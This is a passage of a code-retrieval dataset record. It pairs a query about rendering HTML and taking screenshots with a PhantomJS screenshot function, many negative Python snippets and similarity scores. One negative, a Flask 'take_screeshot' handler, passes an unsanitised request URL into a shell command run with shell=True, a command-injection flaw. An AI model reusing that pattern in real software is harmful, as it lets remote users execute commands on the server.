rwx_chars=\"rwx\" ):\n return (\n ( rwx_chars[0] if self.readable else fillchar ) +\n ( rwx_chars[1] if self.writable else fillchar ) +\n ( rwx_chars[2] if self.executable else fillchar )\n )", "def _preprocess(self, sent: str) -> str:\n sent = sent.replace(\" \", \"▁\")\n return \" \".join([c for c in sent])", "def text(self, str: str, x: int, y: int, colour: int, /) -> None:", "def generate_strings(self, new_puzzle):\n return new_puzzle._start", "def __str__(self):\n local_s = 'F30A: '\n local_s += '\\n'\n return local_s", "def Scheme(self) -> str:", "def test_str_method(self):\n s1 = Square(4, 6, 2, 12)\n self.assertEqual(s1.__str__(), '[Square] (12) 6/2 - 4')", "def __str__(self):\n width = self.width\n if self.length == 0:\n percent = 1\n else:\n percent = max(self.value, 0) / self.length\n pg_char = self.pg_char\n ending = ' ' + (self.str_time_remaining()\n if self.timer else '{0} of {1} complete'.format(\n self.value, self.length))\n if width - len(ending) < 10 or self.has_output:\n self.width = 0\n if self.timer:\n return \"{0:.0%} complete: {1}\".format(\n percent, self.str_time_remaining())\n return \"{0:.0%} complete\".format(percent)\n num_of_chars = int(percent * self.width)\n pbar = '[' + pg_char*num_of_chars + \\\n ' '*(self.width-num_of_chars) + ']' + ending\n\n str_percent = ' {0:.0%} '.format(percent)\n\n return pbar[:self.width//2 - 2] \\\n + str_percent + pbar[self.width//2+len(str_percent) - 2:]", "def __str__(self):\n return str(\"{0} {1} {2} {3}\".format(self.label, self.position[0], self.position[1], self.position[2]))", "def to_string(self):\n return _parrot_str_to_str(self.val)", "def _get_papy_sentence(self):\n sentences = [\n \"un crayon basique peut écrire jusqu’à 45 000 mots. \",\n \"la troisième langue officielle de la \"\n \"Nouvelle-Zélande est le langage des signes.\",\n \"si la Terre faisait la taille d’un grain de sable, \"\n \"le Soleil ferait la taille d’une orange.\",\n \"à la base, le papier bulle a été inventé \"\n \"pour servir de papier peint.\",\n ]\n chosen_sentence = random.choice(sentences)\n response = \"J'ai une histoire à te raconter : \" + chosen_sentence\n return response", "def _(string):\n\t\treturn string", "def area(lado):\n\treturn \"El area de un cuadrado es \"+ str(lado*lado)", "def test_str(self):\n self.assertEqual(str(self.meter), \"1 * m\")\n\n newton = self.kgram * self.meter / (self.second ** 2)\n\n self.assertEqual(str(newton), \"1.0 * kg * m * s^-2\")", "def cargaAutoStr(pila):\n while not pila_llena(pila):\n largo = random.randint(1, 15)\n apilar(pila, randString(largo))", "def pstring( s ) :\r\n\r\n if s is None : \r\n return None \r\n\r\n # else ... \r\n\r\n fmt = '%dp' % ( len(s) + 1 ) \r\n\r\n ps = struct.pack(fmt, s) \r\n\r\n # # debug \r\n # print \"pstring('%s', '%s') : '%s'\" % (fmt, s, ps)\r\n\r\n return ps", "def simple_str(self):\n pass", "def unit(self) -> str:", "def prescription(self):\n prescription = \"\\n{0:>10}\\t{1:>10}\\t{2:>10}\\t{3:>10}\\n\".format(\"R\",\"Material\",\"d\",\"diameter\")\n for surface in self.lensSurfaces():\n prescription += \"{0:>10.2f}\\t{1:>10}\\t{2:>10.2f}\\t{3:>10.2f}\\n\".format(surface.R, str(surface.mat), surface.spacing, surface.diameter)\n return prescription", "def test_str(self):\n s1 = Square(4, 2, 3, 47)\n self.assertEqual(str(s1), \"[Square] (47) 2/3 - 4\")", "def primera_palabra_mayuscula(cadena):\n palabras = cadena.split(\" \")\n frase_final = \"\"\n for palabra in palabras: # recorro la palabra separada \n frase_final += palabra.capitalize() + \" \" # agarro la palabra separado y la primera letra la pongo en mayuscula \n return frase_final", "def basestr(cls: Any) -> str:\n return baserepr(cls)" ]
[ "0.5971977", "0.59691834", "0.5927014", "0.59089327", "0.58850706", "0.5883489", "0.5877891", "0.5867647", "0.58412963", "0.5805934", "0.57704586", "0.5736824", "0.57056093", "0.5686816", "0.5681042", "0.5671489", "0.5662893", "0.56376225", "0.5629446", "0.56220335", "0.5607931", "0.5601104", "0.5598237", "0.5593191", "0.55482614", "0.5536287", "0.5530084", "0.5498233", "0.5497834", "0.54927486", "0.54901236", "0.5487561", "0.54854167", "0.5484605", "0.5476983", "0.5460412", "0.545289", "0.5445977", "0.54436886", "0.54436886", "0.54436886", "0.54436886", "0.54436886", "0.5439312", "0.5436519", "0.54234964", "0.542262", "0.54191464", "0.5411185", "0.5410431", "0.5398833", "0.5392749", "0.5392749", "0.5392749", "0.5392749", "0.5383065", "0.5380118", "0.53790176", "0.53779054", "0.5373808", "0.5373808", "0.5373808", "0.5373808", "0.5373808", "0.53733176", "0.53733176", "0.5370966", "0.536941", "0.5363878", "0.5363663", "0.536291", "0.53612137", "0.5361174", "0.5359777", "0.53538", "0.5350581", "0.53436834", "0.53401315", "0.53388447", "0.53330886", "0.53283656", "0.53277653", "0.5326088", "0.5322", "0.53201634", "0.5319735", "0.5317267", "0.5316739", "0.5314059", "0.53082776", "0.5303636", "0.5302428", "0.5301727", "0.5300432", "0.52998805", "0.5296118", "0.52956223", "0.5287614", "0.5280274", "0.52775645" ]
0.599477
0
renders html and takes a screenshot
def screenshot(url, path): # open in webpage driver = webdriver.PhantomJS() driver.set_window_size(1080, 800) driver.set_page_load_timeout(30) driver.get(url) driver.save_screenshot(path) driver.quit()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_screenshot(html_file, year):\r\n\tdriver = webdriver.PhantomJS()\r\n\tdriver.set_window_size(800, 800)\r\n\tdriver.get(html_file)\r\n\r\n\t#allows the page to load completely\r\n\ttime.sleep(2)\r\n\r\n\timage = 'images/' + str(year) + '.png'\r\n\r\n\tdriver.save_screenshot(image)\r\n\tdriver.quit()\r\n\r\n\tcrop_image(image, year)", "def preview():\r\n html = create_html_report()\r\n return html", "def screenshot(self):\n self.context.draw.window.screenshot(self.filename)", "def image_capture_demo():\n return render_template('image_capture_demo.html')", "async def capture_screenshot(self) -> bytes:", "def screen_shot():\n screen_shot_string_io = StringIO.StringIO()\n ImageGrab.grab().save(screen_shot_string_io, \"PNG\")\n screen_shot_string_io.seek(0)\n return screen_shot_string_io.read()", "def render(self, screen):\n pass", "def render(self, screen):\n pass", "def screenshot(filename):\n call([\"screencapture\", \"Screenshot for\" + strftime(\"%Y-%m-%d %H:%M:%S\", gmtime()) + filename +\".jpg\"])", "def screenshot_tweet(id_str):\n try:\n driver = webdriver.PhantomJS()\n driver.set_window_size(1024, 768)\n driver.get('https://twitter.com/statuses/{}?lang=pt-br'.format(id_str))\n\n # getting element containing the tweet body\n element = driver.find_element_by_class_name('permalink-tweet-container')\n location = element.location\n size = element.size\n driver.save_screenshot('./screenshots/full_screenshot_{}.png'.format(id_str))\n driver.quit()\n\n # cropping the full screenshot around desired element\n im = Image.open('./screenshots/full_screenshot_{}.png'.format(id_str))\n left = location['x']\n top = location['y']\n right = location['x'] + size['width']\n bottom = location['y'] + size['height']\n im = im.crop((left, top, right, bottom))\n im.save('./screenshots/screenshot_{}.png'.format(id_str))\n os.remove('./screenshots/full_screenshot_{}.png'.format(id_str))\n return 'screenshot_{}.png'.format((id_str))\n except:\n return -1", "def display_html_report():\n display(HTML('report_page.html'))", "def view_html_page():\n\n return render_template(\"moby.html\")", "def takeScreenshot ():\n\n im = ImageGrab.grab()\n return im", "def to_html(self, result_dir):\n png_path = self.png_path(result_dir)\n data_table = self.html_data_table()\n return \"XXX figure html\"", "def fullpage_screenshot(self, file_name, viewport_height=0, fixed_header_loc=None, fixed_footer_loc=None):\n\n from PIL import Image\n import io\n\n driver = self.driver\n total_width = driver.execute_script(\"return document.body.offsetWidth\")\n total_height = driver.execute_script(\"return document.body.parentNode.scrollHeight\")\n viewport_width = driver.execute_script(\"return document.body.clientWidth\")\n if viewport_height == 0:\n viewport_height = driver.execute_script(\"return window.innerHeight\")\n rectangles = []\n\n def remote_fixed_section(locator):\n time.sleep(0.1)\n driver.execute_script(\"arguments[0].setAttribute('style', 'position: absolute; top: 0px;');\", locator)\n\n i = 0\n while i < total_height:\n ii = 0\n top_height = i + viewport_height\n\n if top_height > total_height:\n top_height = total_height\n\n while ii < total_width:\n top_width = ii + viewport_width\n\n if top_width > total_width:\n top_width = total_width\n\n rectangles.append((ii, i, top_width, top_height))\n\n ii = ii + viewport_width\n\n i = i + viewport_height\n\n stitched_image = Image.new('RGB', (total_width, total_height))\n previous = None\n part = 0\n\n for rectangle in rectangles:\n if previous is not None:\n driver.execute_script(\"window.scrollTo({0}, {1})\".format(rectangle[0], rectangle[1]))\n if fixed_footer_loc:\n remote_fixed_section(fixed_footer_loc)\n if fixed_header_loc:\n remote_fixed_section(fixed_footer_loc)\n if fixed_header_loc or fixed_footer_loc:\n time.sleep(0.1)\n\n screenshot = Image.open(io.BytesIO(driver.get_screenshot_as_png()))\n\n if rectangle[1] + viewport_height > total_height:\n offset = (rectangle[0], total_height - viewport_height)\n else:\n offset = (rectangle[0], rectangle[1])\n\n stitched_image.paste(screenshot, offset)\n\n del screenshot\n part = part + 1\n previous = rectangle\n\n driver.execute_script(\"window.scrollTo({0}, {1})\".format(0, 0))\n time.sleep(.1)\n stitched_image.save(file_name)", "def export_screenshot(self):\n\n if self.vis_type is None or len(self.vis_type) < 1:\n vis_type_suffix = ''\n else:\n vis_type_suffix = self.vis_type\n\n print(\"exporting screenshot for {}\".format(self.current_unit_id))\n ss_out_file = self.screenshot_dir / \"{}_{}_{}.{}\".format(\n self.current_unit_id, vis_type_suffix,\n cfg.screenshot_suffix, cfg.screenshot_format_ext)\n self.fig.savefig(ss_out_file, bbox_inches='tight', dpi=cfg.dpi_export_fig)", "def screenshot(self, name):\n screenshot_name = str(self.screenshot_count) + \"_\" + name + \".png\"\n self.log(\"Taking screenshot: \" + screenshot_name)\n # on Android, switching context to NATIVE_APP for screenshot\n # taking to get screenshots also stored to Testdroid Cloud\n # device run view. After screenshot switching back to\n # WEBVIEW. Works ok for Safari too.\n orig_context = self.driver.current_context\n self.driver.switch_to.context(\"NATIVE_APP\")\n self.driver.save_screenshot(self.screenshot_dir + \"/\" + screenshot_name)\n # only change context if originally context was WEBVIEW\n if orig_context not in self.driver.current_context:\n self.driver.switch_to.context(orig_context)\n self.screenshot_count += 1", "def capture_screenshot(self, output_path):\n self._driver.get_screenshot_as_file(str(output_path))", "def take_screenshot(browser, test_name):\n screenshot_file_path = \"screenshots/{}.png\".format(test_name)\n browser.save_screenshot(screenshot_file_path)", "def generate_image(encoded_url):\n url_to_fetch = urllib.parse.unquote_plus(encoded_url)\n # domain = os.environ.get('DOMAIN', 'https://casparwre.de')\n # if not url_to_fetch.startswith(domain):\n # app.logger.info(f'Not allowed to generate preview for this domain: {url_to_fetch}')\n # abort(405)\n app.logger.debug(f'Generating preview for {url_to_fetch}')\n driver.get(url_to_fetch)\n sleep(2)\n driver.set_window_size(1100, 600)\n\n screenshot_path = '/tmp/image.png'\n driver.save_screenshot(screenshot_path)\n output_size = (550,300)\n i = Image.open(screenshot_path)\n i.thumbnail(output_size)\n i.save(screenshot_path)\n # driver.quit()\n return send_file(screenshot_path, mimetype='image/png')", "def get_screenshot(self):\n method_name = self._testMethodName\n class_name = type(self).__name__\n time_now = datetime.now().strftime('%Y-%m-%d_%H-%M-%S')\n folder = os.path.dirname(os.getcwd())\n directory = \"\".join([folder, \"/test-results/\", class_name])\n\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n file_name = \"%s/%s - %s.png\" % (directory, time_now, method_name)\n\n self.driver.get_screenshot_as_file(file_name)\n print \"[[ATTACHMENT|%s]]\" % file_name\n print \"current url - %s\" % self.driver.current_url", "def print_html(html):\n display(HTML(html))", "def take_screeshot():\n\n # generate a unique identifier for the screenshot\n if not settings.screenshot_app:\n return ('Screenshots are disabled', 404)\n\n url, width, height = parse_querystring(request)\n\n if url is None:\n return ('Please provide a URL argument', 422)\n\n\n crop = request.args.get('crop', \"--crop\")\n if crop == \"no\": crop = \"--no-crop\"\n\n # find domain name\n parsed_uri = urlparse(url)\n domain = parsed_uri.netloc\n screenshot_path = os.path.join(settings.screenshots_path, domain)\n \n path = parsed_uri.path\n if not path: \n path = \"\"\n else:\n path = path[1:].replace(\"/\", \"%2F\")\n # construct file name\n filename = \"{path}___{size}___{timestamp}\".format(\n path=path,\n size=\"{0}x{1}\".format(width, height),\n timestamp=datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n )\n cwd = os.getcwd()\n\n mkdir = 'mkdir -p \"{0}\"'.format(screenshot_path)\n cd1 = 'cd \"{0}\"'.format(screenshot_path)\n cd2 = 'cd \"{0}\"'.format(cwd)\n take_screenshot = \"{screenshot_app} {url} {width}x{height} {crop} --filename '{filename}'\".format(\n screenshot_app=settings.screenshot_app,\n url=url,\n width=width,\n height=height,\n filename=filename,\n crop=crop\n )\n \n command = '{mkdir} && {cd1} && {take_screenshot} && {cd2}'.format(\n mkdir=mkdir,\n cd1=cd1,\n take_screenshot=take_screenshot,\n cd2=cd2\n )\n \n output = subprocess.call(command, stdout=subprocess.PIPE, shell=True)\n \n screenshot_identifier = domain + \"/\" + filename + \".png\"\n screenshot_url = SCREENSHOTS_ROOT + \"/\" + screenshot_identifier\n return jsonify(url=screenshot_url, id=screenshot_identifier)", "def screenshot(filestring):\r\n\r\n from pi3d.Display import Display\r\n LOGGER.info('Taking screenshot of \"%s\"', filestring)\r\n\r\n w, h = Display.INSTANCE.width, Display.INSTANCE.height\r\n size = h * w * 3\r\n img = (ctypes.c_char * size)()\r\n opengles.glReadPixels(0, 0, w, h, GL_RGB, GL_UNSIGNED_BYTE, ctypes.byref(img))\r\n\r\n im = Image.frombuffer('RGB', (w, h), img, 'raw', 'RGB', 0, 1)\r\n im = im.transpose(Image.FLIP_TOP_BOTTOM)\r\n im.save(filestring)", "def rawHTMLrendered(self):", "def takeScreenshot(self,name,description,type=-1,annotate=True):\n #framework? #test\n profbox()\n self.delayDisplay(description)\n\n if self.enableScreenshots == 0:\n return\n\n lm = slicer.app.layoutManager()\n # switch on the type to get the requested window\n widget = 0\n if type == -1:\n # full window\n widget = slicer.util.mainWindow()\n elif type == slicer.qMRMLScreenShotDialog().FullLayout:\n # full layout\n widget = lm.viewport()\n elif type == slicer.qMRMLScreenShotDialog().ThreeD:\n # just the 3D window\n widget = lm.threeDWidget(0).threeDView()\n elif type == slicer.qMRMLScreenShotDialog().Red:\n # red slice window\n widget = lm.sliceWidget(\"Red\")\n elif type == slicer.qMRMLScreenShotDialog().Yellow:\n # yellow slice window\n widget = lm.sliceWidget(\"Yellow\")\n elif type == slicer.qMRMLScreenShotDialog().Green:\n # green slice window\n widget = lm.sliceWidget(\"Green\")\n\n # grab and convert to vtk image data\n qpixMap = qt.QPixmap().grabWidget(widget)\n qimage = qpixMap.toImage()\n imageData = vtk.vtkImageData()\n slicer.qMRMLUtils().qImageToVtkImageData(qimage,imageData)\n \n if annotate==True:\n annotationLogic = slicer.modules.annotations.logic()\n annotationLogic.CreateSnapShot(name, description, type, self.screenshotScaleFactor, imageData)", "def take_screenshot(x, y, num=''):\n # screenshot takes starting x,y coordinates and then for how far the shot should stretch\n pic = pyautogui.screenshot(region=(0, y * 1.3, x * 0.75, y * 0.6))\n pic.save(\"Screenshot\" + str(num) + \".png\")", "def TakeScreenShot(rect):\r\n\r\n # Create a DC for the whole screen area\r\n dcScreen = wx.ScreenDC()\r\n\r\n # Create a Bitmap that will later on hold the screenshot image\r\n # Note that the Bitmap must have a size big enough to hold the screenshot\r\n # -1 means using the current default colour depth\r\n bmp = wx.EmptyBitmap(rect.width, rect.height)\r\n\r\n # Create a memory DC that will be used for actually taking the screenshot\r\n memDC = wx.MemoryDC()\r\n\r\n # Tell the memory DC to use our Bitmap\r\n # all drawing action on the memory DC will go to the Bitmap now\r\n memDC.SelectObject(bmp)\r\n\r\n # Blit (in this case copy) the actual screen on the memory DC\r\n # and thus the Bitmap\r\n memDC.Blit( 0, # Copy to this X coordinate\r\n 0, # Copy to this Y coordinate\r\n rect.width, # Copy this width\r\n rect.height, # Copy this height\r\n dcScreen, # From where do we copy?\r\n rect.x, # What's the X offset in the original DC?\r\n rect.y # What's the Y offset in the original DC?\r\n )\r\n\r\n # Select the Bitmap out of the memory DC by selecting a new\r\n # uninitialized Bitmap\r\n memDC.SelectObject(wx.NullBitmap)\r\n\r\n return bmp", "def img(self):\n return Image(self.driver.get_screenshot_as_png())", "def take_screenshot(self, filepath):\n self.driver.get_screenshot_as_file(filepath)", "def test_screenshots_generated():\n with temporary_dir() as output_dir:\n output_dir = Path(output_dir)\n copyfile(\n TEST_ROBOT_OUTPUT_FILES / \"robot_screenshots.xml\",\n output_dir / \"output.xml\",\n )\n open(output_dir / \"selenium-screenshot-1.png\", mode=\"w+\")\n open(output_dir / \"selenium-screenshot-2.png\", mode=\"w+\")\n\n flowtask = FlowTaskFactory()\n robot_importer.import_robot_test_results(flowtask, output_dir)\n\n # output.xml asset created\n assert 1 == BuildFlowAsset.objects.filter(category=\"robot-output\").count()\n # suite setup screenshot assets created\n assert 1 == BuildFlowAsset.objects.filter(category=\"robot-screenshot\").count()\n # No screenshots created for 'Via API' test\n tr_method = models.TestMethod.objects.get(name=\"Via API\")\n test_api = models.TestResult.objects.get(method=tr_method, task=flowtask)\n assert 0 == test_api.assets.count()\n\n # One screenshot created for 'Via UI' test\n tr_method = models.TestMethod.objects.get(name=\"Via UI\")\n test_ui = models.TestResult.objects.get(method=tr_method, task=flowtask)\n assert 1 == test_ui.assets.count()", "def show_me():\n # Scumbag thumbnail code\n try:\n from PIL import Image\n except ImportError:\n pass\n else:\n filename = os.path.join(app.static_folder, 'img', 'badumtss.png')\n image = Image.open(filename)\n\n return render_template('show_me.html')", "def take_desktop_screenshot(self):\n filepath = self._get_screenshot_path(\"whitelib_screenshot_{index}.png\")\n directory = os.path.dirname(filepath)\n if not os.path.exists(directory):\n os.makedirs(directory)\n logger.info(get_link_path(filepath, self._log_directory))\n logger.info(\n '</td></tr><tr><td colspan=\"3\">'\n '<a href=\"{src}\"><img src=\"{src}\" width=\"800px\"></a>'.format(\n src=get_link_path(filepath, self._log_directory)\n ),\n html=True,\n )\n bmp = Desktop.CaptureScreenshot()\n bmp.Save(filepath, ImageFormat.Png)\n return filepath", "def __take_screenshot(web_driver: webdriver, test_name: str):\n root_dir = os.path.dirname(os.path.abspath(__file__)).replace(\"tests\", \"reports\")\n file_name = f\"{str(datetime.datetime.now().timestamp())}_{test_name}.jpg\"\n screenshot_file_path = os.path.join(root_dir, file_name)\n web_driver.save_screenshot(screenshot_file_path)", "def render_camera_view():\n return render_template('inspection_screen_new.html', travel_distance=distance, the_inspection_time=elapsed_time, realsense_device_status=realsense_enabled, detector_enabled=enable_detection, detections=detections_results, report_details=inspection_report)", "def test_screenshot_then_show():\n vpl.figure()\n vpl.quick_test_plot()\n vpl.screenshot_fig()\n vpl.show()", "def result(self):\n return self.tmpl_out(\"result.html\",\n height=image(self.work_dir\n + 'output.png').size[1])", "def screenshot(G, folderpath, filename):\n imagepath = os.path.join(folderpath, \"{filename}.png\")\n log(f\"SCREENSHOT {imagepath} with {G.order()} nodes, {G.size()} edges\")\n A = nx.nx_agraph.to_agraph(G)\n A.graph_attr.update()\n A.draw(path=imagepath, prog=\"dot\")", "def save_image(html_path: str, image_file_path: str) -> None:\n options = Options()\n options.add_argument(\"--headless\")\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--disable-dev-shm-usage\")\n chrome_prefs = dict()\n options.experimental_options[\"prefs\"] = chrome_prefs\n chrome_prefs[\"profile.default_content_settings\"] = {\"images\": 2}\n\n tmpurl = 'file://{path}/{mapfile}'.format(path=os.getcwd(), mapfile=html_path)\n\n browser = webdriver.Chrome(executable_path='./chromedriver', options=options)\n browser.get(tmpurl)\n time.sleep(2)\n browser.save_screenshot(image_file_path)\n browser.quit()", "def takeScreenshot(self, driver):\n fileName = str(round(time.time() * 1000)) + \".png\"\n screenshotDirectory = \"/Users/echalo/PycharmProjects/ICP Framwork/screenshots\"\n destinationFile = screenshotDirectory + fileName\n\n try:\n driver.save_screenshot(destinationFile)\n print(\"Screenshot saved to directory --> :: \" + destinationFile)\n except NotADirectoryError:\n print(\"Not a directory issue\")", "def download_screenshot_command():\n # 1. Get input scan id and resolution from Demisto\n scanid = demisto.args().get('scanid')\n resolution = demisto.args().get('resolution')\n # 2. Get the forensic webpage screenshot from SlashNext API\n response = download_screenshot(scanid=scanid, resolution=resolution)\n if response.get('errorNo') != 0:\n return\n # 3. Parse and format the response\n sc_base64 = response.get('scData').get('scBase64')\n sc_data = base64.b64decode(sc_base64)\n\n sc_file = fileResult('slashnext_{}.jpg'.format(scanid), sc_data, entryTypes['image'])\n\n demisto.results({\n 'Type': entryTypes['image'],\n 'ContentsFormat': formats['text'],\n 'Contents': 'Forensics: Webpage Screenshot for URL Scan ID = {}'.format(scanid),\n 'File': sc_file.get('File'),\n 'FileID': sc_file.get('FileID')\n })", "def draw(self, stats=[]):\n clear_output(wait=True)\n svg_html = self.to_html(stats)\n display(svg_html)", "def screenshot(self, name=None, scale=None):\n\n if not self.is_rendered:\n self.render(interactive=False)\n\n timestamp = datetime.now().strftime(\"%Y%m%d_%H%M%S\")\n name = name or f\"brainrender_screenshot_{timestamp}\"\n if \".png\" not in name:\n name += \".png\"\n\n scale = scale or settings.SCREENSHOT_SCALE\n\n print(f\"\\nSaving new screenshot at {name}\\n\")\n\n savepath = str(self.screenshots_folder / name)\n logger.debug(f\"Saving scene at {savepath}\")\n self.plotter.screenshot(filename=savepath, scale=scale)\n return savepath", "def screenshot(self, locator: Locator, filename: Union[str, Path]) -> str:\n return super().screenshot(locator, filename)", "def get_html(self):\r\n context = {\r\n 'display_name': self.display_name_with_default,\r\n 'instructions_html': self.instructions,\r\n 'annotation_storage': self.annotation_storage_url,\r\n 'token': retrieve_token(self.user, self.annotation_token_secret),\r\n 'tag': self.instructor_tags,\r\n 'openseadragonjson': self.openseadragonjson,\r\n }\r\n\r\n return self.system.render_template('imageannotation.html', context)", "def get_screen():\n img_title = 'screen_' + g.client_id + '.png'\n image_path = STATIC_FILES_PATH + img_title\n if g.driver_status != WhatsAPIDriverStatus.LoggedIn:\n try:\n g.driver.get_qr(image_path)\n return send_file(image_path, mimetype='image/png')\n except Exception as err:\n pass\n g.driver.screenshot(image_path)\n return send_file(image_path, mimetype='image/png')", "def _repr_html_(self) -> str:\n # Speical case inside Google Colab\n if \"google.colab\" in sys.modules:\n load_notebook(hide_banner=True)\n script, div, _ = notebook_content(self.to_render)\n return f\"{div}<script>{script}</script>\"\n\n # Windows forbids us open the file twice as the result bokeh cannot\n # write to the opened temporary file.\n with NamedTemporaryFile(suffix=\".html\", delete=False) as tmpf:\n pass\n\n save(\n self.to_render,\n filename=tmpf.name,\n resources=CDN,\n template=INLINE_TEMPLATE,\n title=\"DataPrep.EDA Report\",\n )\n with open(tmpf.name, \"r\") as f:\n output_html = f.read()\n\n # Delete the temporary file\n Path(tmpf.name).unlink()\n\n # Fix the bokeh: bokeh wrongly call the \"waiting for bokeh to load\" function\n # inside \"Bokeh.safely\", which causes Bokeh not found because\n # Bokeh is even not loaded!\n patched_html = output_html.replace(\n \"Bokeh.safely\",\n \"var __dataprep_bokeh_fix = (f) => document.Bokeh === undefined ? setTimeout(f, 1000) : f(); __dataprep_bokeh_fix\", # pylint: disable=line-too-long\n )\n # embed into report template created by us here\n return patched_html", "def show_browser(self) -> None:\n\n # set delete = False to avoid early delete when user open multiple plots.\n with NamedTemporaryFile(suffix=\".html\", delete=False) as tmpf:\n save(\n self.to_render,\n filename=tmpf.name,\n resources=CDN,\n title=\"DataPrep.EDA Report\",\n )\n webbrowser.open_new_tab(f\"file://{tmpf.name}\")", "def takeScreenshot(self, name, description, type=-1, annotate=True):\r\n # framework? #test\r\n profbox()\r\n self.delayDisplay(description)\r\n\r\n if self.enableScreenshots == 0:\r\n return\r\n\r\n lm = slicer.app.layoutManager()\r\n # switch on the type to get the requested window\r\n widget = 0\r\n if type == -1:\r\n # full window\r\n widget = slicer.util.mainWindow()\r\n elif type == slicer.qMRMLScreenShotDialog().FullLayout:\r\n # full layout\r\n widget = lm.viewport()\r\n elif type == slicer.qMRMLScreenShotDialog().ThreeD:\r\n # just the 3D window\r\n widget = lm.threeDWidget(0).threeDView()\r\n elif type == slicer.qMRMLScreenShotDialog().Red:\r\n # red slice window\r\n widget = lm.sliceWidget(\"Red\")\r\n elif type == slicer.qMRMLScreenShotDialog().Yellow:\r\n # yellow slice window\r\n widget = lm.sliceWidget(\"Yellow\")\r\n elif type == slicer.qMRMLScreenShotDialog().Green:\r\n # green slice window\r\n widget = lm.sliceWidget(\"Green\")\r\n\r\n # grab and convert to vtk image data\r\n qpixMap = qt.QPixmap().grabWidget(widget)\r\n qimage = qpixMap.toImage()\r\n imageData = vtk.vtkImageData()\r\n slicer.qMRMLUtils().qImageToVtkImageData(qimage, imageData)\r\n\r\n if annotate == True:\r\n annotationLogic = slicer.modules.annotations.logic()\r\n annotationLogic.CreateSnapShot(name, description, type, self.screenshotScaleFactor, imageData)", "def print_html_report(report, title, img_name):\n import jinja2\n\n template_loader = jinja2.FileSystemLoader(searchpath=\"./\")\n template_env = jinja2.Environment(loader=template_loader)\n template_file = \"template.html\"\n template = template_env.get_template(template_file)\n heads = [\"Name\", \"Version\", \"Size\"]\n heads_comp = [\"Name\", \"Size\", \"Component\"]\n output_text = template.render(pips=report[\"pips\"],\n rpms=report[\"rpms\"],\n apts=report[\"apts\"],\n files_list=report[\"files\"],\n bundles=report[\"bundles\"],\n heads=heads,\n heads_comp=heads_comp,\n img_name=img_name,\n title=title)\n report_title = 'report_%s.html' % (title)\n html_file = open(report_title, 'w')\n html_file.write(output_text)\n html_file.close()", "def screenShot(self, cam=None, path=os.path.expanduser('~'), basenm='view'):\n if cam is None:\n # This allows use to dynamicly select cameras\n cam = GetActiveCamera()\n os.chdir(path)\n self.view(cam=cam)\n WriteImage(\"%s.png\" % (basenm))", "def display_html_snapshots_widget():\n if not get_ipython():\n print('The HTML snapshot widget cannot be display in environments other than IPython.')\n return\n\n # Configure notebook display preferences to better suit this UI. These display settings\n # will be in effect for all cells in the notebook run after this one is run.\n pd.set_option('display.max_colwidth', None)\n pd.set_option('display.max_rows', None)\n get_ipython().run_cell_magic(\n 'javascript',\n '',\n '''// Display cell outputs to full height (no vertical scroll bar)\n IPython.OutputArea.auto_scroll_threshold = 9999;''')\n\n # Retrieve the workspace metadata for the current user and environment.\n ws_meta = WorkspaceMetadata()\n workspace_names2id = collections.OrderedDict(sorted(\n ws_meta.get_workspace_name_to_id_mapping().items()))\n workspace_names2id_include_readonly = collections.OrderedDict(sorted(\n ws_meta.get_workspace_name_to_id_mapping(include_private_readonly=True).items()))\n workspace_ids2bucket_include_readonly = ws_meta.get_workspace_id_to_bucket_mapping(include_private_readonly=True)\n workspace_paths = {k: WorkspacePaths(workspace_bucket=v)\n for k, v in workspace_ids2bucket_include_readonly.items()}\n\n ui_output = widgets.Output()\n\n ui_tabs = widgets.Tab()\n ui_tabs.children = [create_html_snapshot_widget(ws_names2id=workspace_names2id,\n ws_paths=workspace_paths,\n output=ui_output),\n create_view_files_widget(ws_names2id=workspace_names2id_include_readonly,\n ws_paths=workspace_paths,\n output=ui_output),\n create_view_all_comments_widget(ws_names2id=workspace_names2id_include_readonly,\n ws_paths=workspace_paths,\n output=ui_output)]\n ui_tabs.set_title(title='Create', index=0)\n ui_tabs.set_title(title='View one', index=1)\n ui_tabs.set_title(title='View all', index=2)\n\n display(ui_tabs, ui_output)", "def screenshot():\n\tprint(\"Taking screenshot...\")\n\twith mss.mss() as screenshot:\n\t\tmonitor = screenshot.monitors[0]\n\t\tshot = screenshot.grab(monitor)\n\t\tframe = np.array(Image.frombytes(\"RGB\", (shot.width, shot.height), shot.rgb))\n\t\tframe_2 = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\treturn computer_hash(frame_2)", "def take_screenshot(self, filename):\n self.scene.capture(filename)", "async def capture_and_upload_screenshot(self) -> None:", "def takeScreenshot(self, driver):\n\n fileName = str(round(time.time() * 1000)) + \".png\"\n screenshotDirectory = \"C://Users/Mathe/Desktop//Selenium WebDriver with Python 3.x/Advanced/\"\n destinationFile = screenshotDirectory + fileName\n try:\n driver.save_screenshot(destinationFile)\n print(\"Screenshot saved to directory -> \" + destinationFile)\n except NotADirectoryError:\n print(\"Not a directory issue!!\")", "def create_html_report():\r\n\r\n #Sample DataFrame\r\n df = pd.DataFrame(np.random.randn(7,4)\r\n ,columns=['one','two','three','four']\r\n ,index=['a','b','c','d','e','f','g'])\r\n\r\n #Formatting rule\r\n def color_negative_red(val):\r\n color = 'red' if val<0 else 'black'\r\n return f'color: {color}'\r\n\r\n styler = df.style.applymap(color_negative_red)\r\n\r\n #Chart plotting\r\n filename = \"\".join([APP_ROOT, \"\\\\static\\\\images\\\\\" , \"plot.svg\"])\r\n #Plot\r\n ax = df.plot.bar()\r\n fig = ax.get_figure()\r\n fig.savefig(filename)\r\n\r\n #Template handling\r\n env = jinja2.Environment(loader=jinja2.FileSystemLoader(searchpath='./templates/'))\r\n template = env.get_template('template.html')\r\n\r\n filename = \"file:///\" + filename\r\n html = template.render(my_table=styler.render(), img_url=filename)\r\n\r\n return html", "def _repr_html_(self):\n import io\n import base64\n from PIL import Image\n\n library_name = \"vedo.assembly.Assembly\"\n help_url = \"https://vedo.embl.es/docs/vedo/assembly.html\"\n\n arr = self.thumbnail(zoom=1.1, elevation=-60)\n\n im = Image.fromarray(arr)\n buffered = io.BytesIO()\n im.save(buffered, format=\"PNG\", quality=100)\n encoded = base64.b64encode(buffered.getvalue()).decode(\"utf-8\")\n url = \"data:image/png;base64,\" + encoded\n image = f\"<img src='{url}'></img>\"\n\n # statisitics\n bounds = 